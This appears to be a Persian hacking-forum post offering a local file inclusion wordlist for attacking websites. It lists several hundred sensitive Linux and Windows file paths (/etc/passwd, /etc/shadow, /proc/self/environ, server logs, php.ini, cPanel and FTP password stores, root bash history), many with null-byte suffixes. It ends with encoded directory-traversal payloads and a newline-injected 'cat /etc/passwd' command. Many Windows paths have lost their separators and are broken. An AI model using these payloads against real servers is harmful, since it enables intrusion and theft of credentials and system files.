زمان جاری : سه شنبه 07 بهمن 1399 - 12:04 بعد از ظهر
نام کاربری : پسورد : یا عضویت | رمز عبور را فراموش کردم


ارسال پاسخ
تعداد بازدید 141
نویسنده پیام
demon آفلاین


ارسال‌ها : 84
عضویت: 17 /2 /1397
سن: 22
تشکرها : 386
تشکر شده : 361
دانلود مسیرهای باگ و فایلهای سرور در سایتها
دانلود web files , linux files , lfi , Intruders . windows files bypass
مسیرهای فایل های مهم و باگ ها و پسورد ها در سایت های لینوکس و ویندوز


دانلود :


نمونه :
List_Of_File_To_Includeکد:

apache2logaccess_log
apache2logaccess.log
apache2logerror_log
apache2logerror.log
/apache2/logs/access.log
/apache2/logs/access.log
apache2logsaccess_log
apache2logsaccess.log
/apache2/logs/access.log%00
/apache2/logs/error.log
/apache2/logs/error.log
apache2logserror_log
apache2logserror.log
/apache2/logs/error.log%00
apachelogaccess_log
apachelogaccess.log
apachelogerror_log
apachelogerror.log
/apache/logs/access.log
/apache/logs/access.log
/apache/logs/access.log
apachelogsaccess_log
apachelogsaccess.log
/apache/logs/access.log%00
/apache/logs/error.log
/apache/logs/error.log
/apache/logs/error.log
apachelogserror_log
apachelogserror.log
/apache/logs/error.log%00
/apachephpphp.ini
/apachephpphp.ini
/apachephpphp.ini%00
/bin/php.ini
/bin/php.ini
/bin/php.ini%00
c:apachephpphp.ini
C:apachephpphp.ini
C:oot.ini
c:home2instableapachephp.ini
C:home2instableapachephp.ini
c:homeinstableapachephp.ini
C:homeinstableapachephp.ini
C:MySQLdatahostname.err
C:MySQLdatamysql-bin.log
C:MySQLdatamysql.err
C:MySQLdatamysql.log
C:MySQLmy.cnf
C:MySQLmy.ini
c:NetServerinstableapachephp.ini
c:php4php.ini
C:php4php.ini
C:php4sessions
c:php5php.ini
C:php5php.ini
C:php5sessions
c:phpphp.ini
c:PHPphp.ini
C:phpphp.ini
C:phpsessions
C:ProgramFilesApacheGroupApache2confhttpd.conf
C:ProgramFilesApacheGroupApacheconfhttpd.conf
C:ProgramFilesApacheGroupApachelogsaccess.log
C:ProgramFilesApacheGroupApachelogserror.log
C:ProgramFilesMySQLdatahostname.err
C:ProgramFilesMySQLdatamysql-bin.log
C:ProgramFilesMySQLdatamysql.err
C:ProgramFilesMySQLdatamysql.log
C:ProgramFilesMySQLmy.cnf
C:ProgramFilesMySQLmy.ini
C:ProgramFilesMySQLMySQLServer5.0datahostname.err
C:ProgramFilesMySQLMySQLServer5.0datamysql-bin.log
C:ProgramFilesMySQLMySQLServer5.0datamysql.err
C:ProgramFilesMySQLMySQLServer5.0datamysql.log
C:ProgramFilesMySQLMySQLServer5.0my.cnf
C:ProgramFilesMySQLMySQLServer5.0my.ini
C:ProgramFilesxamppapacheconfhttpd.conf
c:WINDOWSphp.ini
C:WINDOWSphp.ini
C:WINDOWSRepairSAM
C:WINDOWSTEMP
C:WINDOWSwin.ini
c:WINNTphp.ini
C:WINNTphp.ini
C:WINNTwin.ini
c:xamppapacheinphp.ini
C:xamppapacheinphp.ini
etc%2fpasswd
etc%2fpasswd%00
etc%5cpasswd
etc%5cpasswd%00
/etc/apache2/apache2.conf
/etc/apache2.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/conf/httpd.conf%00
/etc/apache2/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/httpd.conf%00
/etc/apache2/sites-available/default
/etc/apache2/sites-enabled/000-default
/etc/apache/apache.conf
/etc/apache/conf/httpd.conf
/etc/apache/conf/httpd.conf
/etc/apache/conf/httpd.conf%00
/etc/apache/httpd.conf
etc%c0%afpasswd
etc%c0%afpasswd%00
/etc/chrootUsers
/etc/chrootUsers
/etc/chrootUsers%00
/etc/crontab
/etc/fstab
/etc/ftpchroot
/etc/ftpchroot
/etc/ftpchroot%00
/etc/ftphosts
/etc/ftphosts
/etc/ftphosts%00
/etc/group
/etc/group
/etc/group%00
/etc/hosts
/etc/http/conf/httpd.conf
/etc/http/conf/httpd.conf
/etc/http/conf/httpd.conf%00
/etc/httpd.conf
/etc/httpd.conf
/etc/httpd.conf%00
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf%00
/etc/httpd/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/httpd.conf%00
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log%00
/etc/httpd/logs/error.log%00
/etc/httpd/php.ini
/etc/httpd/php.ini
/etc/httpd/php.ini%00
/etc/http/httpd.conf
/etc/http/httpd.conf
/etc/http/httpd.conf%00
/etc/inittab
/etc/issue
/etc/issue
/etc/logrotate.d/ftp
/etc/logrotate.d/ftp
/etc/logrotate.d/ftp%00
/etc/logrotate.d/proftpd
/etc/logrotate.d/proftpd
/etc/logrotate.d/proftpd%00
/etc/logrotate.d/vsftpd.log
/etc/logrotate.d/vsftpd.log
/etc/logrotate.d/vsftpd.log%00
/etc/master.passwd
/etc/motd
/etc/motd
/etc/my.cnf
/etc/my.cnf
/etc/my.cnf%00
/etc/mysql/my.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf%00
/etc/nginx.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-available/default
/etc/nginx/sites-enabled/default
/etc/pam.d/proftpd
/................/etc/passwd
/etc/passwd
/etc/passwd
/etc/passwd%00
etc/passwd%00
/etc/php4.4/fcgi/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4.4/fcgi/php.ini%00
/etc/php4/apache2/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache2/php.ini%00
/etc/php4/apache/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache/php.ini%00
/etc/php4/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php4/cgi/php.ini%00
/etc/php5/apache2/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache2/php.ini%00
/etc/php5/apache/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache/php.ini%00
/etc/php5/cgi/php.ini
/etc/php5/cgi/php.ini
/etc/php5/cgi/php.ini%00
/etc/php/apache2/php.ini
/etc/php/apache2/php.ini
/etc/php/apache2/php.ini%00
/etc/php/apache/php.ini
/etc/php/apache/php.ini
/etc/php/apache/php.ini%00
/etc/php/cgi/php.ini
/etc/php/cgi/php.ini
/etc/php/cgi/php.ini%00
/etc/php.ini
/etc/php.ini
/etc/php.ini%00
/etc/phpmyadmin/config.inc.php
/etc/php/php4/php.ini
/etc/php/php4/php.ini
/etc/php/php4/php.ini%00
/etc/php/php.ini
/etc/php/php.ini
/etc/php/php.ini%00
/etc/proftp.conf
/etc/proftp.conf
/etc/proftp.conf%00
/etc/proftpd/modules.conf
/etc/proftpd/modules.conf
/etc/proftpd/modules.conf%00
/etc/protpd/proftpd.conf
/etc/protpd/proftpd.conf
/etc/protpd/proftpd.conf%00
/etc/pure-ftpd.conf
/etc/pure-ftpd.conf
/etc/pure-ftpd.conf%00
/etc/pureftpd.passwd
/etc/pureftpd.passwd
/etc/pureftpd.passwd%00
/etc/pureftpd.pdb
/etc/pureftpd.pdb
/etc/pureftpd.pdb%00
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf%00
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.pdb%00
/etc/pure-ftpd/pureftpd.pdb%00
/etc/redhat-release
/etc/release
/etc/security/environ
/etc/security/environ
/etc/security/environ%00
/etc/security/group
/etc/security/group
/etc/security/group%00
/etc/security/limits
/etc/security/limits
/etc/security/limits%00
/etc/security/passwd
/etc/security/passwd
/etc/security/passwd%00
/etc/security/user
/etc/security/user
/etc/security/user%00
/etc/shadow
/etc/shadow~
/etc/shadow
/etc/shadow%00
/etc/ssh/sshd_config
/etc/sysconfig/network-scripts/ifcfg-eth0
/etc/vhcs2/proftpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf%00
/etc/vsftpd.chroot_list
/etc/vsftpd.chroot_list
/etc/vsftpd.chroot_list%00
/etc/vsftpd.conf
/etc/vsftpd.conf
/etc/vsftpd.conf%00
/etc/vsftpd/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/vsftpd/vsftpd.conf%00
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftpaccess%00
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftphosts%00
/etc/wu-ftpd/ftpusers
/etc/wu-ftpd/ftpusers
/etc/wu-ftpd/ftpusers%00
/home2instableapachephp.ini
/home2instableapachephp.ini
/home2instableapachephp.ini%00
/homeinstableapachephp.ini
/homeinstableapachephp.ini
/homeinstableapachephp.ini%00
logaccess_log
logaccess.log
logerror_log
logerror.log
loghttpdaccess_log
loghttpderror_log
/logs/access_log
/logs/access_log
/logs/access.log
/logs/access.log
logsaccess_log
logsaccess.log
/logs/access.log%00
/logs/error_log
/logs/error_log
/logs/error.log
/logs/error.log
logserror_log
logserror.log
/logs/error.log%00
logshttpdaccess_log
logshttpderror_log
/logs/pure-ftpd.log
/logs/pure-ftpd.log
/logs/pure-ftpd.log%00
mysqlinmy.ini
/NetServerinstableapachephp.ini
/NetServerinstableapachephp.ini
/NetServerinstableapachephp.ini%00
/opt/apache2/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/opt/apache2/conf/httpd.conf%00
/opt/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf%00
/opt/lampp/logs/access_log
/opt/lampp/logs/access_log
/opt/lampp/logs/access.log
/opt/lampp/logs/access.log
/opt/lampp/logs/access_log%00
/opt/lampp/logs/access.log%00
/opt/lampp/logs/error_log
/opt/lampp/logs/error_log
/opt/lampp/logs/error.log
/opt/lampp/logs/error.log
/opt/lampp/logs/error_log%00
/opt/lampp/logs/error.log%00
/opt/xampp/etc/php.ini
/opt/xampp/etc/php.ini
/opt/xampp/etc/php.ini%00
/opt/xampp/logs/access_log
/opt/xampp/logs/access_log
/opt/xampp/logs/access.log
/opt/xampp/logs/access.log
optxampplogsaccess_log
optxampplogsaccess.log
/opt/xampp/logs/access_log%00
/opt/xampp/logs/access.log%00
/opt/xampp/logs/error_log
/opt/xampp/logs/error_log
/opt/xampp/logs/error.log
/opt/xampp/logs/error.log
optxampplogserror_log
optxampplogserror.log
/opt/xampp/logs/error_log%00
/opt/xampp/logs/error.log%00
/php4php.ini
/php4php.ini
/php4php.ini%00
/php5php.ini
/php5php.ini
/php5php.ini%00
php://input
/phpphp.ini
/phpphp.ini
/PHPphp.ini
/PHPphp.ini
/phpphp.ini%00
/PHPphp.ini%00
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf%00
/private/etc/httpd/httpd.conf.default
/private/etc/httpd/httpd.conf.default
/private/etc/httpd/httpd.conf.default%00
/proc/cmdline
/proc/self/cmdline
/proc/self/environ
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/proc/self/fd/16
/proc/self/fd/17
/proc/self/fd/18
/proc/self/fd/19
/proc/self/fd/2
/proc/self/fd/20
/proc/self/fd/21
/proc/self/fd/22
/proc/self/fd/23
/proc/self/fd/24
/proc/self/fd/25
/proc/self/fd/255
/proc/self/fd/26
/proc/self/fd/27
/proc/self/fd/28
/proc/self/fd/29
/proc/self/fd/3
/proc/self/fd/30
/proc/self/fd/31
/proc/self/fd/32
/proc/self/fd/33
/proc/self/fd/34
/proc/self/fd/35/etc/passwd%00
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/proc/self/stat
/proc/self/status
/proc/version
/Program FilesApache GroupApache2confhttpd.conf
/Program FilesApache GroupApache2confhttpd.conf
Program FilesApache GroupApache2confhttpd.conf
/Program FilesApache GroupApache2confhttpd.conf%00
/Program FilesApache GroupApacheconfhttpd.conf
/Program FilesApache GroupApacheconfhttpd.conf
Program FilesApache GroupApacheconfhttpd.conf
/Program FilesApache GroupApacheconfhttpd.conf%00
/Program FilesApache GroupApachelogsaccess.log
/Program FilesApache GroupApachelogsaccess.log
Program FilesApache GroupApachelogsaccess.log
/Program FilesApache GroupApachelogsaccess.log%00
/Program FilesApache GroupApachelogserror.log
/Program FilesApache GroupApachelogserror.log
Program FilesApache GroupApachelogserror.log
/Program FilesApache GroupApachelogserror.log%00
/Program Filesxamppapacheconfhttpd.conf
/Program Filesxamppapacheconfhttpd.conf
/Program Filesxamppapacheconfhttpd.conf%00
Program Filesxamppapacheconfhttpd.confetc/passwd
/root/.bash_history
/tmp/sess_<sessid>
/usr/apache2/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/apache2/conf/httpd.conf%00
/usr/apache/conf/httpd.conf
/usr/apache/conf/httpd.conf
/usr/apache/conf/httpd.conf%00
/usr/etc/pure-ftpd.conf
/usr/etc/pure-ftpd.conf
/usr/etc/pure-ftpd.conf%00
/usr/lib/php.ini
/usr/lib/php.ini
/usr/lib/php.ini%00
/usr/lib/php/php.ini
/usr/lib/php/php.ini
/usr/lib/php/php.ini%00
/usr/lib/security/mkuser.default
/usr/lib/security/mkuser.default
/usr/lib/security/mkuser.default%00
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf%00
/usr/local/apache2/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/httpd.conf%00
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access_log%00
/usr/local/apache2/logs/access.log%00
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error_log%00
/usr/local/apache2/logs/error.log%00
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/httpd.conf%00
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/php.ini%00
/usr/local/apache/httpd.conf
/usr/local/apache/httpd.conf
/usr/local/apache/httpd.conf%00
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_ log%00
/usr/local/apache/logs/access_log%00
/usr/local/apache/logs/access. log%00
/usr/local/apache/logs/access.log%00
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log%00
/usr/local/apache/logs/error.log%00
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf%00
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf%00
/usr/local/cpanel/logs
/usr/local/cpanel/logs
/usr/local/cpanel/logs%00
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/access_log%00
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/error_log%00
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/license_log%00
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/login_log%00
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/stats_log%00
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf%00
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf%00
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache/vhosts.conf%00
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf%00
/usr/local/etc/php.ini
/usr/local/etc/php.ini
/usr/local/etc/php.ini%00
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf%00
/usr/local/etc/pureftpd.pdb
/usr/local/etc/pureftpd.pdb
/usr/local/etc/pureftpd.pdb%00
/usr/local/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf%00
/usr/local/lib/php.ini
/usr/local/lib/php.ini
/usr/local/lib/php.ini%00
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf%00
/usr/local/php4/httpd.conf.php
/usr/local/php4/httpd.conf.php
/usr/local/php4/httpd.conf.php%00
/usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini%00
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf%00
/usr/local/php5/httpd.conf.php
/usr/local/php5/httpd.conf.php
/usr/local/php5/httpd.conf.php%00
/usr/local/php5/lib/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/lib/php.ini%00
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf%00
/usr/local/php/httpd.conf.php
/usr/local/php/httpd.conf.php
/usr/local/php/httpd.conf.php%00
/usr/local/php/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php/lib/php.ini%00
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pure-ftpd.conf%00
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/etc/pureftpd.pdb%00
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/sbin/pure-config.pl%00
/usr/local/Zend/etc/php.ini
/usr/local/Zend/etc/php.ini
/usr/local/Zend/etc/php.ini%00
/usr/pkgsrc/net/pureftpd/
/usr/pkgsrc/net/pureftpd/
/usr/pkgsrc/net/pureftpd/%00
/usr/ports/contrib/pure-ftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/contrib/pure-ftpd/%00
/usr/ports/ftp/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/ftp/pure-ftpd/%00
/usr/ports/net/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/ports/net/pure-ftpd/%00
/usr/sbin/pure-config.pl
/usr/sbin/pure-config.pl
/usr/sbin/pure-config.pl%00
/var/adm/lastlog
/var/adm/log/xferlog
/var/adm/log/xferlog
/var/adm/log/xferlog%00
/var/adm/messages
/var/adm/messages.0
/var/adm/messages.1
/var/adm/messages.2
/var/adm/messages.3
/var/adm/utmpx
/var/adm/wtmpx
/var/cpanel/cpanel.config
/var/cpanel/cpanel.config
/var/cpanel/cpanel.config%00
/var/db/shadow/hash
/var/lib/mysql/my.cnf
/var/lib/mysql/my.cnf
/var/lib/mysql/my.cnf%00
/var/lib/php5/session/sess_<sessid>
/var/lib/php/session/sess_<sessid>
/var/local/www/conf/php.ini
/var/local/www/conf/php.ini
/var/local/www/conf/php.ini%00
/var/log/access_log
/var/log/access_log
/var/log/access_log
/var/log/access.log
/var/log/access.log
/var/log/access.log
/var/log/access_log%00
/var/log/access.log%00
/var/log/apache2/access_log
/var/log/apache2/access_log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/access.log
/var/log/apache2/access_log%00
/var/log/apache2/access.log%00
/var/log/apache2/error_log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/error.log
/var/log/apache2/error.log
/var/log/apache2/error_log%00
/var/log/apache2/error.log%00
/var/log/apache/access_log
/var/log/apache/access_log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/access.log
/var/log/apache/access_log%00
/var/log/apache/access.log%00
/var/log/apache/error_log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/error.log
/var/log/apache/error.log
/var/log/apache/error_log%00
/var/log/apache/error.log%00
/var/log/authlog
/var/log/auth.log
/var/log/auth.log.0
/var/log/auth.log.0.gz
/var/log/auth.log.1
/var/log/auth.log.1.gz
/var/log/auth.log.2
/var/log/auth.log.2.gz
/var/log/auth.log.3
/var/log/auth.log.3.gz
/var/log/error_log
/var/log/error_log
/var/log/error.log
/var/log/error.log
/var/log/error_log%00
/var/log/error.log%00
/var/log/exim_mainlog
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim/mainlog
/var/log/exim_mainlog%00
/var/log/exim/mainlog%00
/var/log/exim_paniclog
/var/log/exim_paniclog
/var/log/exim/paniclog
/var/log/exim/paniclog
/var/log/exim_paniclog%00
/var/log/exim/paniclog%00
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/exim/rejectlog
/var/log/exim/rejectlog%00
/var/log/exim_rejectlog%00/etc/issue
/var/log/exim_rejectlog/etc/passwd
/var/log/ftplog
/var/log/ftplog
/var/log/ftplog%00
/var/log/ftp-proxy
/var/log/ftp-proxy
/var/log/ftp-proxy%00
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy/ftp-proxy.log%00
/var/log/httpd/access_log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/access_log%00
/var/log/httpd/access.log%00
/var/log/httpd/error_log
/var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpd/error_log%00
/var/log/httpd/error.log%00
/var/log/kernel.log
/var/log/lastlog
/var/log/maillog
/var/log/mail.log
/var/log/maillog
/var/log/maillog%00
/var/log/messages
/var/log/messages.0
/var/log/messages.0.gz
/var/log/messages.1
/var/log/messages.1.gz
/var/log/messages.2
/var/log/messages.2.gz
/var/log/messages.3
/var/log/messages.3.gz
/var/log/messages.log
/var/log/mysqlderror.log
/var/log/mysqlderror.log
/var/log/mysqlderror.log%00
/var/log/mysql.log
/var/log/mysql.log
/var/log/mysql.log%00
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-bin.log%00
/var/log/mysql/mysql.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql.log%00
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql-slow.log%00
/var/log/nginx/access_log
/var/log/nginx/access_log
/var/log/nginx/access_log
/var/log/nginx/access.log
/var/log/nginx/access.log
/var/log/nginx/access_log%00
/var/log/nginx/access.log%00
/var/log/nginx/error_log
/var/log/nginx/error_log
/var/log/nginx/error.log
/var/log/nginx/error.log
/var/log/nginx/error.log
/var/log/nginx/error_log%00
/var/log/nginx/error.log%00
/var/log/proftpd
/var/log/proftpd
/var/log/proftpd%00
/var/log/pureftpd.log
/var/log/pureftpd.log
/var/log/pureftpd.log%00
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pure-ftpd/pure-ftpd.log%00
/var/log/secure.log
/var/log/syslog
/var/log/syslog.0
/var/log/syslog.0.gz
/var/log/syslog.1
/var/log/syslog.1.gz
/var/log/syslog.2
/var/log/syslog.2.gz
/var/log/syslog.3
/var/log/syslog.3.gz
/var/log/syslog.log
/var/log/vsftpd.log
/var/log/vsftpd.log
/var/log/vsftpd.log%00
/var/log/wtmp
/var/log/xferlog
/var/log/xferlog
/var/log/xferlog%00
/var/mail/apache
/var/mail/nobody
/var/mail/www
/var/mail/www-data
/var/mysql.log
/var/mysql.log
/var/mysql.log%00
/var/root/.bash_history
/var/root/.sh_history
/var/run/utmp
/var/www/.bash_history
/var/www/conf/httpd.conf
/var/www/conf/httpd.conf
/var/www/conf/httpd.conf%00
/var/www/config.php
/var/www/logs/access_log
/var/www/logs/access_log
/var/www/logs/access_log
/var/www/logs/access.log
/var/www/logs/access.log
/var/www/logs/access_log%00
/var/www/logs/access.log%00
/var/www/logs/error_log
/var/www/logs/error_log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/error.log
/var/www/logs/error.log
/var/www/logs/error_log%00
/var/www/logs/error.log%00
/var/www/mgr/logs/access_log
/var/www/mgr/logs/access.log
/var/www/mgr/logs/error_log
/var/www/mgr/logs/error.log
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/opt/apache2/conf/httpd.conf%00
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf%00
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/Volumes/webBackup/private/etc/httpd/httpd.conf.default%00
/web/conf/php.ini
/web/conf/php.ini
/web/conf/php.ini%00
/WINDOWSphp.ini
/WINDOWSphp.ini
/WINDOWSphp.ini%00
/WINNTphp.ini
/WINNTphp.ini
/WINNTphp.ini%00
/www/logs/proftpd.system.log
/www/logs/proftpd.system.log
/www/logs/proftpd.system.log%00
/xamppapacheinphp.ini
/xamppapacheinphp.ini
/xamppapacheinphp.ini%00
xamppapacheconfhttpd.conf
xamppapachelogsaccess.log
xamppapachelogserror.log
xamppFileZillaFTPFileZilla Server.xml
xamppFileZillaFTPLogs
xamppFileZillaFTPLogsaccess.log
xamppFileZillaFTPLogserror.log
xamppMercuryMailLOGSaccess.log
xamppMercuryMailLOGSerror.log
xamppMercuryMailmercury.ini
xamppmysqldatamysql.err
xamppphpmyadminconfig.inc
xamppphpMyAdminconfig.inc
xamppphpmyadminconfig.inc.php
xamppphpMyAdminconfig.inc.php
xamppphpmyadminphpinfo.php
xamppphpMyAdminphpinfo.php
xamppphpphp.ini
xamppsendmailsendmail.ini
xamppsendmailsendmail.log
xampp omcatconf omcat-users.xml
xampp omcatconfweb.xml
xamppwebalizerwebalizer.conf
xamppwebdavwebdav.txtbypass lfi


کد:

/.../.../.../.../.../
…..…..…..
%00../../../../../../etc/passwd
%00/etc/passwd%00
%00../../../../../../etc/shadow
%00/etc/shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
/../../../../../../../../%2A
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
